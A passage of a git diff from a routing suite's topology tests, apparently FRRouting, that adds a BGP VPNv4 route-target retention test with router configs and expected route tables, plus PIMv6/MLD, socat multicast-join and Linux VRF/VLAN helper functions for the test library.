+ r1 = tgen.gears["r1"]
+ r1_snmp = SnmpTester(r1, "10.1.1.1", "public", "2c")
+
+ return r1_snmp.test_oid("bgpVersion", "10")
+
+ _, result = topotest.run_and_expect(_convergence, True, count=20, wait=1)
assertmsg = "BGP SNMP does not seem to be running"
- assert r1_snmp.test_oid("bgpVersion", "10"), assertmsg
+ assert result, assertmsg
+
+ r1_snmp = SnmpTester(r1, "10.1.1.1", "public", "2c")
count = 0
passed = False
while count < 125:
diff --git a/tests/topotests/bgp_vpnv4_noretain/__init__.py b/tests/topotests/bgp_vpnv4_noretain/__init__.py
new file mode 100644
index 0000000000..e69de29bb2
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/__init__.py
diff --git a/tests/topotests/bgp_vpnv4_noretain/r1/bgpd.conf b/tests/topotests/bgp_vpnv4_noretain/r1/bgpd.conf
new file mode 100644
index 0000000000..3d8773b8bf
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r1/bgpd.conf
@@ -0,0 +1,24 @@
+router bgp 65500
+ bgp router-id 1.1.1.1
+ neighbor 10.125.0.2 remote-as 65500
+ address-family ipv4 unicast
+ no neighbor 10.125.0.2 activate
+ exit-address-family
+ address-family ipv4 vpn
+ neighbor 10.125.0.2 activate
+ no bgp retain route-target all
+ exit-address-family
+!
+router bgp 65500 vrf vrf1
+ bgp router-id 1.1.1.1
+ address-family ipv4 unicast
+ redistribute connected
+ label vpn export 101
+ rd vpn export 444:1
+ rt vpn import 51:100 52:100
+ rt vpn export 51:100
+ export vpn
+ import vpn
+ exit-address-family
+!
+
diff --git a/tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes.json b/tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes.json
new file mode 100644
index 0000000000..903c4603c5
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes.json
@@ -0,0 +1,69 @@
+{
+ "vrfId":0,
+ "vrfName":"default",
+ "tableVersion":1,
+ "routerId":"1.1.1.1",
+ "defaultLocPrf":100,
+ "localAS":65500,
+ "routes":{
+ "routeDistinguishers":{
+ "444:1":{
+ "10.201.0.0/24":[
+ {
+ "valid":true,
+ "bestpath":true,
+ "selectionReason":"First path received",
+ "pathFrom":"external",
+ "prefix":"10.201.0.0",
+ "prefixLen":24,
+ "network":"10.201.0.0\/24",
+ "version":1,
+ "metric":0,
+ "weight":32768,
+ "peerId":"(unspec)",
+ "path":"",
+ "origin":"incomplete",
+ "announceNexthopSelf":true,
+ "nhVrfName":"vrf1",
+ "nexthops":[
+ {
+ "ip":"0.0.0.0",
+ "afi":"ipv4",
+ "used":true
+ }
+ ]
+ }
+ ]
+ },
+ "444:2":{
+ "10.200.0.0/24":[
+ {
+ "valid":true,
+ "bestpath":true,
+ "selectionReason":"First path received",
+ "pathFrom":"internal",
+ "prefix":"10.200.0.0",
+ "prefixLen":24,
+ "network":"10.200.0.0\/24",
+ "version":1,
+ "metric":0,
+ "locPrf":100,
+ "weight":0,
+ "peerId":"10.125.0.2",
+ "path":"",
+ "origin":"incomplete",
+ "nexthops":[
+ {
+ "ip":"10.125.0.2",
+ "afi":"ipv4",
+ "used":true
+ }
+ ]
+ }
+ ]
+ },
+ "444:3":{
+ }
+ }
+ }
+}
diff --git a/tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes_unfiltered.json b/tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes_unfiltered.json
new file mode 100644
index 0000000000..3cc0b4a5f5
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r1/ipv4_vpn_routes_unfiltered.json
@@ -0,0 +1,94 @@
+{
+ "vrfId":0,
+ "vrfName":"default",
+ "tableVersion":1,
+ "routerId":"1.1.1.1",
+ "defaultLocPrf":100,
+ "localAS":65500,
+ "routes":{
+ "routeDistinguishers":{
+ "444:1":{
+ "10.201.0.0/24":[
+ {
+ "valid":true,
+ "bestpath":true,
+ "selectionReason":"First path received",
+ "pathFrom":"external",
+ "prefix":"10.201.0.0",
+ "prefixLen":24,
+ "network":"10.201.0.0\/24",
+ "version":1,
+ "metric":0,
+ "weight":32768,
+ "peerId":"(unspec)",
+ "path":"",
+ "origin":"incomplete",
+ "announceNexthopSelf":true,
+ "nhVrfName":"vrf1",
+ "nexthops":[
+ {
+ "ip":"0.0.0.0",
+ "afi":"ipv4",
+ "used":true
+ }
+ ]
+ }
+ ]
+ },
+ "444:2":{
+ "10.200.0.0/24":[
+ {
+ "valid":true,
+ "bestpath":true,
+ "selectionReason":"First path received",
+ "pathFrom":"internal",
+ "prefix":"10.200.0.0",
+ "prefixLen":24,
+ "network":"10.200.0.0\/24",
+ "version":1,
+ "metric":0,
+ "locPrf":100,
+ "weight":0,
+ "peerId":"10.125.0.2",
+ "path":"",
+ "origin":"incomplete",
+ "nexthops":[
+ {
+ "ip":"10.125.0.2",
+ "afi":"ipv4",
+ "used":true
+ }
+ ]
+ }
+ ]
+ },
+ "444:3":{
+ "10.210.0.0/24":[
+ {
+ "valid":true,
+ "bestpath":true,
+ "selectionReason":"First path received",
+ "pathFrom":"internal",
+ "prefix":"10.210.0.0",
+ "prefixLen":24,
+ "network":"10.210.0.0\/24",
+ "version":1,
+ "metric":0,
+ "locPrf":100,
+ "weight":0,
+ "peerId":"10.125.0.2",
+ "path":"",
+ "origin":"incomplete",
+ "nexthops":[
+ {
+ "ip":"10.125.0.2",
+ "afi":"ipv4",
+ "used":true
+ }
+ ]
+ }
+ ]
+ }
+ }
+ }
+}
diff --git a/tests/topotests/bgp_vpnv4_noretain/r1/isisd.conf b/tests/topotests/bgp_vpnv4_noretain/r1/isisd.conf
new file mode 100644
index 0000000000..6f5cb6ec68
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r1/isisd.conf
@@ -0,0 +1,14 @@
+interface r1-eth0
+ ip router isis 1
+ isis circuit-type level-1
+!
+interface lo
+ ip router isis 1
+ isis passive
+!
+router isis 1
+ is-type level-1
+ net 49.0002.0000.1994.00
+ segment-routing on
+ segment-routing prefix 1.1.1.1/32 index 11
+!
diff --git a/tests/topotests/bgp_vpnv4_noretain/r1/zebra.conf b/tests/topotests/bgp_vpnv4_noretain/r1/zebra.conf
new file mode 100644
index 0000000000..5b8b1e8ffb
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r1/zebra.conf
@@ -0,0 +1,13 @@
+log stdout
+interface lo
+ ip address 1.1.1.1/32
+!
+interface r1-gre0
+ ip address 192.168.0.1/24
+!
+interface r1-eth1 vrf vrf1
+ ip address 10.201.0.1/24
+!
+interface r1-eth0
+ ip address 10.125.0.1/24
+!
diff --git a/tests/topotests/bgp_vpnv4_noretain/r2/bgpd.conf b/tests/topotests/bgp_vpnv4_noretain/r2/bgpd.conf
new file mode 100644
index 0000000000..235fb31177
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r2/bgpd.conf
@@ -0,0 +1,35 @@
+router bgp 65500
+ bgp router-id 2.2.2.2
+ neighbor 10.125.0.1 remote-as 65500
+ address-family ipv4 unicast
+ no neighbor 10.125.0.1 activate
+ exit-address-family
+ address-family ipv4 vpn
+ neighbor 10.125.0.1 activate
+ no bgp retain route-target all
+ exit-address-family
+!
+router bgp 65500 vrf vrf1
+ bgp router-id 2.2.2.2
+ address-family ipv4 unicast
+ redistribute connected
+ label vpn export 102
+ rd vpn export 444:2
+ rt vpn import 53:100 52:100 51:100
+ rt vpn export 52:100
+ export vpn
+ import vpn
+ exit-address-family
+!
+router bgp 65500 vrf vrf2
+ bgp router-id 2.2.2.2
+ address-family ipv4 unicast
+ redistribute connected
+ label vpn export 102
+ rd vpn export 444:3
+ rt vpn both 53:100 52:100 51:100
+ rt vpn both 53:100
+ export vpn
+ import vpn
+ exit-address-family
+!
diff --git a/tests/topotests/bgp_vpnv4_noretain/r2/isisd.conf b/tests/topotests/bgp_vpnv4_noretain/r2/isisd.conf
new file mode 100644
index 0000000000..cbec8c3674
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r2/isisd.conf
@@ -0,0 +1,14 @@
+interface r2-eth0
+ ip router isis 1
+ isis circuit-type level-1
+!
+interface lo
+ ip router isis 1
+ isis passive
+!
+router isis 1
+ is-type level-1
+ net 49.0002.0000.1995.00
+ segment-routing on
+ segment-routing prefix 2.2.2.2/32 index 22
+!
diff --git a/tests/topotests/bgp_vpnv4_noretain/r2/zebra.conf b/tests/topotests/bgp_vpnv4_noretain/r2/zebra.conf
new file mode 100644
index 0000000000..7ec644ac2a
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r2/zebra.conf
@@ -0,0 +1,16 @@
+log stdout
+interface lo
+ ip address 2.2.2.2/32
+!
+interface r2-gre0
+ ip address 192.168.0.2/24
+!
+interface r2-eth1 vrf vrf1
+ ip address 10.200.0.2/24
+!
+interface r2-eth2 vrf vrf2
+ ip address 10.210.0.2/24
+!
+interface r2-eth0
+ ip address 10.125.0.2/24
+!
diff --git a/tests/topotests/bgp_vpnv4_noretain/test_bgp_vpnv4_noretain.py b/tests/topotests/bgp_vpnv4_noretain/test_bgp_vpnv4_noretain.py
new file mode 100644
index 0000000000..b4a841d9cf
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/test_bgp_vpnv4_noretain.py
@@ -0,0 +1,201 @@
+#!/usr/bin/env python
+
+#
+# test_bgp_vpnv4_noretain.py
+# Part of NetDEF Topology Tests
+#
+# Copyright 2022 6WIND S.A.
+#
+# Permission to use, copy, modify, and/or distribute this software
+# for any purpose with or without fee is hereby granted, provided
+# that the above copyright notice and this permission notice appear
+# in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND NETDEF DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NETDEF BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
+# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
+# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
+# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
+# OF THIS SOFTWARE.
+#
+
+"""
+ test_bgp_vpnv4_noretain.py: Do not keep the VPNvx entries when no
+ VRF matches incoming VPNVx entries
+"""
+
+import os
+import sys
+import json
+from functools import partial
+import pytest
+
+# Save the Current Working Directory to find configuration files.
+CWD = os.path.dirname(os.path.realpath(__file__))
+sys.path.append(os.path.join(CWD, "../"))
+
+# pylint: disable=C0413
+# Import topogen and topotest helpers
+from lib import topotest
+from lib.topogen import Topogen, TopoRouter, get_topogen
+from lib.topolog import logger
+
+# Required to instantiate the topology builder class.
+
+
+pytestmark = [pytest.mark.bgpd]
+
+def build_topo(tgen):
+ "Build function"
+
+ tgen.add_router("r1")
+ tgen.add_router("r2")
+
+ switch = tgen.add_switch("s1")
+ switch.add_link(tgen.gears["r1"])
+ switch.add_link(tgen.gears["r2"])
+
+ switch = tgen.add_switch("s2")
+ switch.add_link(tgen.gears["r1"])
+
+ switch = tgen.add_switch("s3")
+ switch.add_link(tgen.gears["r2"])
+
+ switch = tgen.add_switch("s4")
+ switch.add_link(tgen.gears["r2"])
+
+
+def _populate_iface():
+ tgen = get_topogen()
+ cmds_list = [
+ 'modprobe mpls_router',
+ 'echo 100000 > /proc/sys/net/mpls/platform_labels',
+ 'ip link add vrf1 type vrf table 10',
+ 'ip link set dev vrf1 up',
+ 'ip link set dev {0}-eth1 master vrf1',
+ 'echo 1 > /proc/sys/net/mpls/conf/vrf1/input',
+ ]
+ cmds_list_extra = [
+ 'ip link add vrf2 type vrf table 20',
+ 'ip link set dev vrf2 up',
+ 'ip link set dev {0}-eth2 master vrf2',
+ 'echo 1 > /proc/sys/net/mpls/conf/vrf2/input',
+ ]
+
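+    # Each command template only consumes "{0}" (the router name); the extra
+    # positional arguments passed to format() below are ignored.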
+ for cmd in cmds_list:
+        input = cmd.format('r1', '1', '2')
+        logger.info('input: ' + input)
+        output = tgen.net['r1'].cmd(input)
+ logger.info('output: ' + output)
+
+ for cmd in cmds_list:
+        input = cmd.format('r2', '2', '1')
+        logger.info('input: ' + input)
+        output = tgen.net['r2'].cmd(input)
+ logger.info('output: ' + output)
+
+ for cmd in cmds_list_extra:
+        input = cmd.format('r2', '2', '1')
+        logger.info('input: ' + input)
+        output = tgen.net['r2'].cmd(input)
+ logger.info('output: ' + output)
+
+def setup_module(mod):
+ "Sets up the pytest environment"
+
+ tgen = Topogen(build_topo, mod.__name__)
+ tgen.start_topology()
+
+ router_list = tgen.routers()
+ _populate_iface()
+
+ for rname, router in router_list.items():
+ router.load_config(
+ TopoRouter.RD_ZEBRA, os.path.join(CWD, "{}/zebra.conf".format(rname))
+ )
+ router.load_config(
+ TopoRouter.RD_BGP, os.path.join(CWD, "{}/bgpd.conf".format(rname))
+ )
+ router.load_config(
+            TopoRouter.RD_ISIS, os.path.join(CWD, "{}/isisd.conf".format(rname))
+ )
+
+ # Initialize all routers.
+ tgen.start_router()
+
+
+def teardown_module(_mod):
+ "Teardown the pytest environment"
+ tgen = get_topogen()
+
+ tgen.stop_topology()
+
+
+def test_protocols_convergence():
+ """
+ Assert that all protocols have converged
+ statuses as they depend on it.
+ """
+ tgen = get_topogen()
+ if tgen.routers_have_failure():
+ pytest.skip(tgen.errors)
+
+ # Check IPv4 VPN routing tables on r1
+ logger.info("Checking IPv4 routes for convergence on r1")
+ router = tgen.gears['r1']
+ json_file = "{}/{}/ipv4_vpn_routes.json".format(CWD, router.name)
+ if not os.path.isfile(json_file):
+ logger.info("skipping file {}".format(json_file))
+ assert 0, 'ipv4_vpn_routes.json file not found'
+ return
+
+ expected = json.loads(open(json_file).read())
+ test_func = partial(
+ topotest.router_json_cmp,
+ router,
+ "show bgp ipv4 vpn json",
+ expected,
+ )
+ _, result = topotest.run_and_expect(test_func, None, count=10, wait=0.5)
+ assertmsg = '"{}" JSON output mismatches'.format(router.name)
+ assert result is None, assertmsg
+
+    # Check BGP IPv4 routing tables after re-enabling the retain route-target flag
+    logger.info("Re-enabling 'bgp retain route-target all' on r1")
+ router = tgen.gears['r1']
+ router.vtysh_cmd("configure\nrouter bgp 65500\naddress-family ipv4 vpn\nbgp retain route-target all\n")
+
+ # Check IPv4 VPN routing tables on r1
+ logger.info("Checking IPv4 routes for convergence on r1")
+ router = tgen.gears['r1']
+ json_file = "{}/{}/ipv4_vpn_routes_unfiltered.json".format(CWD, router.name)
+ if not os.path.isfile(json_file):
+ logger.info("skipping file {}".format(json_file))
+ assert 0, 'ipv4_vpn_routes_unfiltered.json file not found'
+ return
+
+ expected = json.loads(open(json_file).read())
+ test_func = partial(
+ topotest.router_json_cmp,
+ router,
+ "show bgp ipv4 vpn json",
+ expected,
+ )
+ _, result = topotest.run_and_expect(test_func, None, count=10, wait=0.5)
+ assertmsg = '"{}" JSON output mismatches'.format(router.name)
+ assert result is None, assertmsg
+
+def test_memory_leak():
+ "Run the memory leak test and report results."
+ tgen = get_topogen()
+ if not tgen.is_memleak_enabled():
+ pytest.skip("Memory leak test/report is disabled")
+
+ tgen.report_memory_leaks()
+
+
+if __name__ == "__main__":
+ args = ["-s"] + sys.argv[1:]
+ sys.exit(pytest.main(args))
diff --git a/tests/topotests/lib/common_config.py b/tests/topotests/lib/common_config.py
index 4afa86f740..fa33b02ed1 100644
--- a/tests/topotests/lib/common_config.py
+++ b/tests/topotests/lib/common_config.py
@@ -449,6 +449,8 @@ def check_router_status(tgen):
daemons.append("zebra")
if "pimd" in result:
daemons.append("pimd")
+ if "pim6d" in result:
+ daemons.append("pim6d")
if "ospfd" in result:
daemons.append("ospfd")
if "ospf6d" in result:
@@ -1035,6 +1037,12 @@ def start_topology(tgen, daemon=None):
TopoRouter.RD_PIM, "{}/{}/pimd.conf".format(tgen.logdir, rname)
)
+ if daemon and "pim6d" in daemon:
+        # Load an empty pim6d.conf file on the router to start the pim6d daemon
+ router.load_config(
+ TopoRouter.RD_PIM6, "{}/{}/pim6d.conf".format(tgen.logdir, rname)
+ )
+
# Starting routers
logger.info("Starting all routers once topology is created")
tgen.start_router()
@@ -1131,6 +1139,8 @@ def topo_daemons(tgen, topo=None):
for val in topo["routers"][rtr]["links"].values():
if "pim" in val and "pimd" not in daemon_list:
daemon_list.append("pimd")
+ if "pim6" in val and "pim6d" not in daemon_list:
+ daemon_list.append("pim6d")
if "ospf" in val and "ospfd" not in daemon_list:
daemon_list.append("ospfd")
if "ospf6" in val and "ospf6d" not in daemon_list:
@@ -3234,6 +3244,86 @@ def configure_interface_mac(tgen, input_dict):
return True
+def socat_send_igmp_join_traffic(
+ tgen,
+ server,
+ protocol_option,
+ igmp_groups,
+ send_from_intf,
+ send_from_intf_ip=None,
+ port=12345,
+ reuseaddr=True,
+ join=False,
+ traffic=False,
+):
+ """
+    API to send IGMP/MLD join using the socat tool
+
+ Parameters:
+ -----------
+ * `tgen` : Topogen object
+    * `server`: router from which the IGMP/MLD join would be sent
+ * `protocol_option`: Protocol options, ex: UDP6-RECV
+ * `igmp_groups`: IGMP group for which join has to be sent
+ * `send_from_intf`: Interface from which join would be sent
+ * `send_from_intf_ip`: Interface IP, default is None
+ * `port`: Port to be used, default is 12345
+    * `reuseaddr`: True|False, by default True
+ * `join`: If join needs to be sent
+ * `traffic`: If traffic needs to be sent
+
+ returns:
+ --------
+ errormsg or True
+ """
+
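+    # Illustrative call (interface name and IP are placeholders taken from the
+    # topology JSON in the tests that use this helper):
+    #   socat_send_igmp_join_traffic(tgen, "r0", "UDP6-RECV", "ff08::1",
+    #                                "r0-r1-eth0", intf_ip, join=True)
+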
+ logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
+
+ rnode = tgen.routers()[server]
+ socat_cmd = "socat -u "
+
+ # UDP4/TCP4/UDP6/UDP6-RECV
+ if protocol_option:
+ socat_cmd += "{}".format(protocol_option)
+
+ if port:
+ socat_cmd += ":{},".format(port)
+
+ if reuseaddr:
+ socat_cmd += "{},".format("reuseaddr")
+
+ # Group address range to cover
+ if igmp_groups:
+ if not isinstance(igmp_groups, list):
+ igmp_groups = [igmp_groups]
+
+ for igmp_group in igmp_groups:
+ if join:
+ join_traffic_option = "ipv6-join-group"
+ elif traffic:
+ join_traffic_option = "ipv6-join-group-source"
+
+ if send_from_intf and not send_from_intf_ip:
+ socat_cmd += "{}='[{}]:{}'".format(
+ join_traffic_option, igmp_group, send_from_intf
+ )
+ else:
+ socat_cmd += "{}='[{}]:{}:[{}]'".format(
+ join_traffic_option, igmp_group, send_from_intf, send_from_intf_ip
+ )
+
+ socat_cmd += " STDOUT"
+
+ socat_cmd += " &>{}/socat.logs &".format(tgen.logdir)
+
+ # Run socat command to send IGMP join
+ logger.info("[DUT: {}]: Running command: [{}]".format(server, socat_cmd))
+ output = rnode.run("set +m; {} sleep 0.5".format(socat_cmd))
+
+ logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
+ return True
+
+
#############################################
# Verification APIs
#############################################
diff --git a/tests/topotests/lib/micronet.py b/tests/topotests/lib/micronet.py
index 02f66e9c26..dfa10ccb2f 100644
--- a/tests/topotests/lib/micronet.py
+++ b/tests/topotests/lib/micronet.py
@@ -599,6 +599,60 @@ class LinuxNamespace(Commander):
self.cmd_raises("mkdir -p " + inner)
self.cmd_raises("mount --rbind {} {} ".format(outer, inner))
+ def add_vlan(self, vlanname, linkiface, vlanid):
+ self.logger.debug("Adding VLAN interface: %s (%s)", vlanname, vlanid)
+ ip_path = self.get_exec_path("ip")
+ assert ip_path, "XXX missing ip command!"
+ self.cmd_raises(
+ [
+ ip_path,
+ "link",
+ "add",
+ "link",
+ linkiface,
+ "name",
+ vlanname,
+ "type",
+ "vlan",
+ "id",
+ vlanid,
+ ]
+ )
+ self.cmd_raises([ip_path, "link", "set", "dev", vlanname, "up"])
+
+ def add_loop(self, loopname):
+ self.logger.debug("Adding Linux iface: %s", loopname)
+ ip_path = self.get_exec_path("ip")
+ assert ip_path, "XXX missing ip command!"
+ self.cmd_raises([ip_path, "link", "add", loopname, "type", "dummy"])
+ self.cmd_raises([ip_path, "link", "set", "dev", loopname, "up"])
+
+ def add_l3vrf(self, vrfname, tableid):
+ self.logger.debug("Adding Linux VRF: %s", vrfname)
+ ip_path = self.get_exec_path("ip")
+ assert ip_path, "XXX missing ip command!"
+ self.cmd_raises(
+ [ip_path, "link", "add", vrfname, "type", "vrf", "table", tableid]
+ )
+ self.cmd_raises([ip_path, "link", "set", "dev", vrfname, "up"])
+
+ def del_iface(self, iface):
+ self.logger.debug("Removing Linux Iface: %s", iface)
+ ip_path = self.get_exec_path("ip")
+ assert ip_path, "XXX missing ip command!"
+ self.cmd_raises([ip_path, "link", "del", iface])
+
+ def attach_iface_to_l3vrf(self, ifacename, vrfname):
+ self.logger.debug("Attaching Iface %s to Linux VRF %s", ifacename, vrfname)
+ ip_path = self.get_exec_path("ip")
+ assert ip_path, "XXX missing ip command!"
+ if vrfname:
+ self.cmd_raises(
+ [ip_path, "link", "set", "dev", ifacename, "master", vrfname]
+ )
+ else:
+ self.cmd_raises([ip_path, "link", "set", "dev", ifacename, "nomaster"])
+
def add_netns(self, ns):
self.logger.debug("Adding network namespace %s", ns)
diff --git a/tests/topotests/lib/pim.py b/tests/topotests/lib/pim.py
index cd070e08b9..03ab02460f 100644
--- a/tests/topotests/lib/pim.py
+++ b/tests/topotests/lib/pim.py
@@ -36,6 +36,7 @@ from lib.common_config import (
InvalidCLIError,
retry,
run_frr_cmd,
+ validate_ip_address,
)
from lib.micronet import get_exec_path
from lib.topolog import logger
@@ -47,7 +48,7 @@ CWD = os.path.dirname(os.path.realpath(__file__))
def create_pim_config(tgen, topo, input_dict=None, build=False, load_config=True):
"""
- API to configure pim on router
+ API to configure pim/pimv6 on router
Parameters
----------
@@ -70,6 +71,16 @@ def create_pim_config(tgen, topo, input_dict=None, build=False, load_config=True
"prefix-list": "pf_list_1"
"delete": True
}]
+ },
+ "pim6": {
+ "disable" : ["l1-i1-eth1"],
+ "rp": [{
+ "rp_addr" : "2001:db8:f::5:17".
+ "keep-alive-timer": "100"
+ "group_addr_range": ["FF00::/8"]
+ "prefix-list": "pf_list_1"
+ "delete": True
+ }]
}
}
}
@@ -97,12 +108,8 @@ def create_pim_config(tgen, topo, input_dict=None, build=False, load_config=True
# Now add RP config to all routers
for router in input_dict.keys():
- if "pim" not in input_dict[router]:
- continue
- if "rp" not in input_dict[router]["pim"]:
- continue
- _add_pim_rp_config(tgen, topo, input_dict, router, build, config_data_dict)
-
+ if "pim" in input_dict[router] or "pim6" in input_dict[router]:
+ _add_pim_rp_config(tgen, topo, input_dict, router, build, config_data_dict)
try:
result = create_common_configurations(
tgen, config_data_dict, "pim", build, load_config
@@ -133,81 +140,123 @@ def _add_pim_rp_config(tgen, topo, input_dict, router, build, config_data_dict):
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
+ rp_data = []
+
+ # PIMv4
+ pim_data = None
+ if "pim" in input_dict[router]:
+ pim_data = input_dict[router]["pim"]
+ if "rp" in input_dict[router]["pim"]:
+ rp_data += pim_data["rp"]
- pim_data = input_dict[router]["pim"]
- rp_data = pim_data["rp"]
+ # PIMv6
+ pim6_data = None
+ if "pim6" in input_dict[router]:
+ pim6_data = input_dict[router]["pim6"]
+ if "rp" in input_dict[router]["pim6"]:
+ rp_data += pim6_data["rp"]
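+    # rp_data now combines the PIMv4 and PIMv6 RP entries; the address family
+    # of each entry is detected below with validate_ip_address().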
# Configure this RP on every router.
for dut in tgen.routers():
# At least one interface must be enabled for PIM on the router
pim_if_enabled = False
+ pim6_if_enabled = False
for destLink, data in topo[dut]["links"].items():
if "pim" in data:
pim_if_enabled = True
- if not pim_if_enabled:
+ if "pim6" in data:
+ pim6_if_enabled = True
+ if not pim_if_enabled and pim_data:
+ continue
+ if not pim6_if_enabled and pim6_data:
continue
config_data = []
- for rp_dict in deepcopy(rp_data):
- # ip address of RP
- if "rp_addr" not in rp_dict and build:
- logger.error(
- "Router %s: 'ip address of RP' not " "present in input_dict/JSON",
- router,
- )
-
- return False
- rp_addr = rp_dict.setdefault("rp_addr", None)
-
- # Keep alive Timer
- keep_alive_timer = rp_dict.setdefault("keep_alive_timer", None)
-
- # Group Address range to cover
- if "group_addr_range" not in rp_dict and build:
- logger.error(
- "Router %s:'Group Address range to cover'"
- " not present in input_dict/JSON",
- router,
- )
-
- return False
- group_addr_range = rp_dict.setdefault("group_addr_range", None)
+ if rp_data:
+ for rp_dict in deepcopy(rp_data):
+ # ip address of RP
+ if "rp_addr" not in rp_dict and build:
+ logger.error(
+ "Router %s: 'ip address of RP' not "
+ "present in input_dict/JSON",
+ router,
+ )
- # Group prefix-list filter
- prefix_list = rp_dict.setdefault("prefix_list", None)
+ return False
+ rp_addr = rp_dict.setdefault("rp_addr", None)
+ if rp_addr:
+ addr_type = validate_ip_address(rp_addr)
+ # Keep alive Timer
+ keep_alive_timer = rp_dict.setdefault("keep_alive_timer", None)
+
+ # Group Address range to cover
+ if "group_addr_range" not in rp_dict and build:
+ logger.error(
+ "Router %s:'Group Address range to cover'"
+ " not present in input_dict/JSON",
+ router,
+ )
- # Delete rp config
- del_action = rp_dict.setdefault("delete", False)
+ return False
+ group_addr_range = rp_dict.setdefault("group_addr_range", None)
- if keep_alive_timer:
- cmd = "ip pim rp keep-alive-timer {}".format(keep_alive_timer)
- if del_action:
- cmd = "no {}".format(cmd)
- config_data.append(cmd)
+ # Group prefix-list filter
+ prefix_list = rp_dict.setdefault("prefix_list", None)
- if rp_addr:
- if group_addr_range:
- if type(group_addr_range) is not list:
- group_addr_range = [group_addr_range]
+ # Delete rp config
+ del_action = rp_dict.setdefault("delete", False)
- for grp_addr in group_addr_range:
- cmd = "ip pim rp {} {}".format(rp_addr, grp_addr)
+ if keep_alive_timer:
+ if addr_type == "ipv4":
+ cmd = "ip pim rp keep-alive-timer {}".format(keep_alive_timer)
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+ if addr_type == "ipv6":
+ cmd = "ipv6 pim rp keep-alive-timer {}".format(keep_alive_timer)
if del_action:
cmd = "no {}".format(cmd)
config_data.append(cmd)
- if prefix_list:
- cmd = "ip pim rp {} prefix-list {}".format(rp_addr, prefix_list)
- if del_action:
- cmd = "no {}".format(cmd)
- config_data.append(cmd)
+ if rp_addr:
+ if group_addr_range:
+ if type(group_addr_range) is not list:
+ group_addr_range = [group_addr_range]
- if config_data:
- if dut not in config_data_dict:
- config_data_dict[dut] = config_data
- else:
- config_data_dict[dut].extend(config_data)
+ for grp_addr in group_addr_range:
+ if addr_type == "ipv4":
+ cmd = "ip pim rp {} {}".format(rp_addr, grp_addr)
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+ if addr_type == "ipv6":
+ cmd = "ipv6 pim rp {} {}".format(rp_addr, grp_addr)
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+
+ if prefix_list:
+ if addr_type == "ipv4":
+ cmd = "ip pim rp {} prefix-list {}".format(
+ rp_addr, prefix_list
+ )
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+ if addr_type == "ipv6":
+ cmd = "ipv6 pim rp {} prefix-list {}".format(
+ rp_addr, prefix_list
+ )
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+
+ if config_data:
+ if dut not in config_data_dict:
+ config_data_dict[dut] = config_data
+ else:
+ config_data_dict[dut].extend(config_data)
def create_igmp_config(tgen, topo, input_dict=None, build=False):
@@ -319,6 +368,121 @@ def create_igmp_config(tgen, topo, input_dict=None, build=False):
return result
+def create_mld_config(tgen, topo, input_dict=None, build=False):
+ """
+ API to configure mld for PIMv6 on router
+
+ Parameters
+ ----------
+ * `tgen` : Topogen object
+ * `topo` : json file data
+ * `input_dict` : Input dict data, required when configuring from
+ testcase
+ * `build` : Only for initial setup phase this is set as True.
+
+ Usage
+ -----
+ input_dict = {
+ "r1": {
+ "mld": {
+ "interfaces": {
+ "r1-r0-eth0" :{
+ "mld":{
+ "version": "2",
+ "delete": True
+ "query": {
+ "query-interval" : 100,
+ "query-max-response-time": 200
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+
+ Returns
+ -------
+ True or False
+ """
+ logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
+ result = False
+ if not input_dict:
+ input_dict = deepcopy(topo)
+ else:
+ topo = topo["routers"]
+ input_dict = deepcopy(input_dict)
+ for router in input_dict.keys():
+ if "mld" not in input_dict[router]:
+ logger.debug("Router %s: 'mld' is not present in " "input_dict", router)
+ continue
+
+ mld_data = input_dict[router]["mld"]
+
+ if "interfaces" in mld_data:
+ config_data = []
+ intf_data = mld_data["interfaces"]
+
+ for intf_name in intf_data.keys():
+ cmd = "interface {}".format(intf_name)
+ config_data.append(cmd)
+ protocol = "mld"
+ del_action = intf_data[intf_name]["mld"].setdefault("delete", False)
+ cmd = "ipv6 mld"
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+
+ del_attr = intf_data[intf_name]["mld"].setdefault("delete_attr", False)
+ join = intf_data[intf_name]["mld"].setdefault("join", None)
+ source = intf_data[intf_name]["mld"].setdefault("source", None)
+ version = intf_data[intf_name]["mld"].setdefault("version", False)
+ query = intf_data[intf_name]["mld"].setdefault("query", {})
+
+ if version:
+ cmd = "ipv6 {} version {}".format(protocol, version)
+ if del_action:
+ cmd = "no {}".format(cmd)
